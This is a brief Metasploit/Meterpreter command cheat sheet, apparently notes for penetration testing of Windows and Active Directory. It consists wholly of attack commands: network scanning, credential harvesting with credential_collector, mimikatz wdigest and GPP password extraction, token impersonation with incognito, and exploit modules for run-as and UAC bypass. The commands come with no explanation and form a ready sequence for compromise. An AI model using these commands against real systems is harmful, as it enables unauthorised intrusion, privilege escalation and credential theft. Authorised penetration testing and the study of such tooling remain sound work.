# Metasploit

## Meterpreter

### ARP Scan

```
run arp_scanner -r <IP>/24
```

### Nmap

```
db_nmap -sS -A <IP> 
```

### PortScan

```
run auxiliary/scanner/portscan/tcp
```

### Application Info

```
run post/windows/gather/enum_applications
```

### Credential Gathering

```
run post/windows/gather/credentials/credential_collector

load mimikatz
wdigest

load incognito 
list_tokens -u 
```

### Windows

```
# Collect a load of info 
run winenum

# Show privs
run post/windows/gather/win_privs

# Run as 
use exploit/windows/local/run_as

# Bypass UAC
use exploit/windows/local/bypassuac_injection
```

### AD

```
# Enumeration ADSI
load extapi
help extapi 

adsi_computer_enum domainname 

# GPP 
use post/windows/gather/credentials/gpp
```
